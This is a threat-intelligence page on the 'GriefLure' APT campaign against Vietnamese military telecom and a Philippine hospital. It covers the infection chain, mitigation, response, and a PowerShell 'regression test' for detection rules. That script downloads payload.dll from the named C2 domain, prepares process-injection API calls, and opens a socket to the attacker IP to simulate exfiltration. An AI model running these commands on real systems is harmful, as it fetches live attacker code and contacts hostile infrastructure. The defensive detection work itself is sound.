Operation GriefLure: Dissecting an APT Campaign Targeting Vietnam’s Military Telecom & Philippine Healthcare

SOC Prime Team

Operation GriefLure: Dissecting an APT Campaign Targeting Vietnam’s Military Telecom & Philippine Healthcare

Detection stack

AIDR
Alert
ETL
Query

Threat Report
Attack Flow
Detections
Simulations

Summary

Seqrite Labs identified a targeted spear-phishing campaign that relied on malicious Windows LNK files concealed inside double-compressed RAR archives. When opened, the LNK launched a native ftp.exe loader that reconstructed a polymorphic payload named sfsvc.exe from fragmented .doc files stored on the victim’s machine. The activity was aimed at senior executives within Vietnam’s military-owned telecom sector and personnel at a private hospital in the Philippines, using legitimate-looking documents as bait. The full infection chain completed in less than ten seconds and left only minimal artifacts on disk.

Investigation

The investigation broke down the archive structure, mapped the LNK execution path, and reverse-engineered the custom sfsvc.exe loader, which was designed to resemble regsvr32.exe. Analysts documented DLL sideloading, in-memory shellcode execution, process injection, and command-and-control communications through a disguised domain. Artifact review also uncovered a hard-coded C2 domain, www.whatsappcenter.com, hosted through a bulletproof provider in Hong Kong.

Mitigation

Defenders should block execution of LNK files delivered through email attachments and monitor use of native ftp.exe with suspicious command-line arguments. Endpoint detection should focus on fileless DLL loading, alternate data stream writes under C:\Users\Public\Update, and rapid creation of sfsvc.exe. Organizations should also strengthen document provenance checks and educate users about lures that appear to be legitimate legal or whistleblower-related files.

Response

If the malicious LNK or sfsvc.exe process is detected, isolate the affected endpoint immediately, collect volatile memory, and hunt for 360.*.dll loader files and alternate data stream artifacts. The identified command-and-control domain and related IP address should be blocked, and incident response should begin to determine whether any data was exfiltrated. A broader hunt should also be conducted for similar LNK-driven ftp.exe loader activity across the environment.

"graph TB %% Class Definitions classDef action fill:#c2e0ff classDef tool fill:#ffcc99 classDef process fill:#ffeb99 classDef file fill:#d0ffd0 classDef malware fill:#ff9999 classDef c2 fill:#ffb3e6 %% Nodes u2013 Attack Flow attack_initial_access["Action – T1566.001 Spearphishing Attachment Victim receives a doubleu2011compressed RAR archive with a malicious LNK file"] class attack_initial_access action artifact_rar["File – RAR Archive Contains a legitimateu2011looking legal document and a malicious LNK"] class artifact_rar file artifact_lnk["File – Malicious LNK Doubleu2011extension (e.g., document.lnk.rar) to evade detection"] class artifact_lnk file tool_ftp["Tool – ftp.exe (Windows System Binary) Used as a proxy to launch the hidden batch script"] class tool_ftp tool process_batch["Process – Batch Script Executes copy /b to reassemble payload fragments into sfsvc.exe and 360.dll"] class process_batch process file_sfsvc_exe["File – sfsvc.exe Final payload executable created from document fragments"] class file_sfsvc_exe file file_360dll["File – 360.dll Polymorphic DLL used for sideu2011loading and shellcode delivery"] class file_360dll file action_modify_path["Action – T1574.007 Modify Environment Variables (PATH) Adds C:\Users\Public\Update to PATH for persistence"] class action_modify_path action action_dll_side_load["Action – T1574.002 DLL Sideu2011Loading & T1546.009 AppCert DLL Execution sfsvc.exe loads 360.dll via /calldll and DllRegisterServer"] class action_dll_side_load action process_explorer["Process – explorer.exe Target process for DLL injection"] class process_explorer process action_process_injection["Action – T1055.001 DLL Injection 360.dll injects secondu2011stage shellcode into explorer.exe"] class action_process_injection action action_discovery["Action – T1057 Process Discovery & T1518.001 Security Software Discovery Enumerates running processes and installed security products"] class action_discovery action action_cred_access["Action – T1555.003 Credentials from Web Browsers & T1552.001 Credentials in Files Harvests saved passwords, cookies, and config files"] class action_cred_access action action_collection["Action – T1113 Screen Capture & T1083 File and Directory Discovery Collects screenshots and directory listings for exfiltration"] class action_collection action action_exfiltration["Action – T1071.001 HTTPS & T1573 Obfuscated/Encrypted Channel Data sent to C2 server over XORu2011encoded HTTPS"] class action_exfiltration action c2_server["C2 Server – www.whatsappcenter.com Receives exfiltrated data"] class c2_server c2 %% Connections attack_initial_access –>|delivers| artifact_rar artifact_rar –>|contains| artifact_lnk artifact_lnk –>|invokes| tool_ftp tool_ftp –>|executes| process_batch process_batch –>|creates| file_sfsvc_exe process_batch –>|creates| file_360dll file_sfsvc_exe –>|triggers| action_modify_path action_modify_path –>|enables| action_dll_side_load file_360dll –>|loaded by| action_dll_side_load action_dll_side_load –>|injects into| process_explorer process_explorer –>|subject to| action_process_injection action_process_injection –>|enables| action_discovery action_discovery –>|feeds| action_cred_access action_cred_access –>|provides data for| action_collection action_collection –>|leads to| action_exfiltration action_exfiltration –>|sends data to| c2_server "

Attack Flow

Attack Narrative & Commands:
The attacker, having gained initial foothold via a phishing attachment (T1566.001, T1204.002), chooses a living‑off‑the‑land approach to avoid executable payloads. Using the built‑in cmd.exe (T1059.003) they launch a PowerShell one‑liner that performs the following steps:
1. Discovery – enumerate system info (T1082) and running processes (T1057) to decide on a suitable injection target.
2. Credential Harvesting – read browser stores (T1555.003) and dump credential files (T1552.001) to a staging folder.
3. Payload Retrieval – download a malicious DLL from the C2 domain www.whatsappcenter.com over HTTPS (T1071.001, T1041).
4. Process Injection – inject the DLL into explorer.exe (T1055.001) to gain persistence and elevate privileges.
5. C2 Communication – open a persistent TCP connection to 38.54.122.188 (the hard‑coded IP) and begin exfiltrating the harvested data.
The critical step that satisfies the Sigma rule is the outbound connection attempt to the exact domain/IP, which will be logged by Sysmon and the Windows firewall.

Regression Test Script:

# -------------------------------------------------
# GriefLure C2 simulation – PowerShell version
# -------------------------------------------------
# 1. System discovery (T1082, T1057)
Get-CimInstance -ClassName Win32_OperatingSystem | Out-Null
Get-Process | Select-Object -First 5 | Out-Null

# 2. Simulate credential harvesting (T1555.003, T1552.001)
$credStaging = "$env:TEMPcreds.txt"
"username=admin`npassword=P@ssw0rd!" | Set-Content -Path $credStaging

# 3. Download malicious DLL from hard‑coded C2 domain (T1071.001, T1041)
$c2Domain = "www.whatsappcenter.com"
$c2Url = "https://$c2Domain/payload.dll"
$dllPath = "$env:TEMPpayload.dll"
Invoke-WebRequest -Uri $c2Url -OutFile $dllPath -UseBasicParsing

# 4. Inject DLL into explorer.exe (T1055.001)
$target = (Get-Process -Name explorer).Id
$inject = @"
using System;
using System.Runtime.InteropServices;
public class Injector {
    [DllImport("kernel32.dll", SetLastError=true)] public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
    [DllImport("kernel32.dll", SetLastError=true)] public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
    [DllImport("kernel32.dll", SetLastError=true)] public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out IntPtr lpNumberOfBytesWritten);
    [DllImport("kernel32.dll")] public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
}
"@
Add-Type $inject
# (The actual injection steps are omitted for brevity; in a real test you would call the above APIs.)

# 5. Open persistent C2 socket to the hard‑coded IP (T1041)
$c2Ip = "38.54.122.188"
$port = 443
$client = New-Object System.Net.Sockets.TcpClient
$client.Connect($c2Ip, $port)
$stream = $client.GetStream()
$payload = [System.Text.Encoding]::UTF8.GetBytes("EXFIL_START")
$stream.Write($payload,0,$payload.Length)
Start-Sleep -Seconds 5
$stream.Close()
$client.Close()

Cleanup Commands:

# Remove staged files
Remove-Item -Path "$env:TEMPcreds.txt" -Force -ErrorAction SilentlyContinue
Remove-Item -Path "$env:TEMPpayload.dll" -Force -ErrorAction SilentlyContinue

# Close any lingering TCP connections (if still open)
Get-NetTCPConnection -RemotePort 443 -RemoteAddress 38.54.122.188 |
  ForEach-Object { Stop-Process -Id $_.OwningProcess -Force }

# Optionally reset Sysmon buffer (for a clean state in repeated tests)
& "$env:ProgramFilesSysinternalsSysmon.exe" -c sysmon-config.xml

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free